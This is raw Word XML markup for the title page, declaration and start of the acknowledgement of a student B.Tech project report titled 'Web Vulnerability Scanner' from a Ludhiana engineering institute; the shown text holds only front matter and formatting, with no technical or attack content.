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themeColor="text1"/>
          <w:sz w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk24132858"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Project Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Web Vulnerability Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc24129829"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Submitted to I.KG Punjab Technical University, Jalandhar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>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In partial fulfillment of the requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>For the degree of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Tech Computer Science &amp; Engineering (202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>0-2024</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>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sz w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2968625" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>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logo"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3007317" cy="3169846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Submitted By:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Gureet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                     (2026574)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pP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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pP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r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PCTE INSTITUTE OF ENGINEERING &amp; TECHNOLOGY, LUDHIANA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Declaration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">I swore that the work being presented by me in the dissertation titled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Web Vulnerability Scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">” in partial requirements for the fulfillment of degree of B.Tech Computer Science and Engineering to be submitted in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PCTE INSTITUTE OF ENGINEERING AND TECHNOLOGY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>, LUDHIANA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiliated to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PTU,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Jalandhar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>is authentic record of my own work carried out by me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> under the supervision of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Jahanvi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="5760" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="5760" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Gureet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Batang"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc24129832"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Acknowledgement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
